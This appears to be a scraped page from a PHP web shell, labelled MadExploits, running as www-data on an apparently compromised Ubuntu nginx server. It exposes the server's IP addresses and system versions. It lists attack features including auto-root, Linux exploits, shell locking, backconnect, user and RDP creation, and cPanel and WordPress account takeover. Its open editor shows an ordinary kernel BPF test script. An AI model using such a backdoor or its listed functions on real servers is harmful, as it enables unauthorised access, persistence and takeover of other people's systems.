Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-160 /
samples /
bpf /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
15.86
KB
-rw-r--r--
Makefile.target
2.52
KB
-rw-r--r--
do_hbm_test.sh
12
KB
-rwxr-xr-x
lwt_len_hist.sh
1.02
KB
-rwxr-xr-x
run_cookie_uid_helper_example....
341
B
-rwxr-xr-x
tc_l2_redirect.sh
4.91
KB
-rwxr-xr-x
test_cgrp2_sock.sh
2.89
KB
-rwxr-xr-x
test_cgrp2_sock2.sh
1.76
KB
-rwxr-xr-x
test_cgrp2_tc.sh
4.15
KB
-rwxr-xr-x
test_cls_bpf.sh
915
B
-rwxr-xr-x
test_lwt_bpf.sh
8.96
KB
-rwxr-xr-x
test_override_return.sh
276
B
-rwxr-xr-x
xdp2skb_meta.sh
4.5
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_cls_bpf.sh
#!/bin/bash # SPDX-License-Identifier: GPL-2.0 function pktgen { ../pktgen/pktgen_bench_xmit_mode_netif_receive.sh -i $IFC -s 64 \ -m 90:e2:ba:ff:ff:ff -d 192.168.0.1 -t 4 local dropped=`tc -s qdisc show dev $IFC | tail -3 | awk '/drop/{print $7}'` if [ "$dropped" == "0," ]; then echo "FAIL" else echo "Successfully filtered " $dropped " packets" fi } function test { echo -n "Loading bpf program '$2'... " tc qdisc add dev $IFC clsact tc filter add dev $IFC ingress bpf da obj $1 sec $2 local status=$? if [ $status -ne 0 ]; then echo "FAIL" else echo "ok" pktgen fi tc qdisc del dev $IFC clsact } IFC=test_veth ip link add name $IFC type veth peer name pair_$IFC ip link set $IFC up ip link set pair_$IFC up test ./parse_simple.o simple test ./parse_varlen.o varlen test ./parse_ldabs.o ldabs ip link del dev $IFC
Close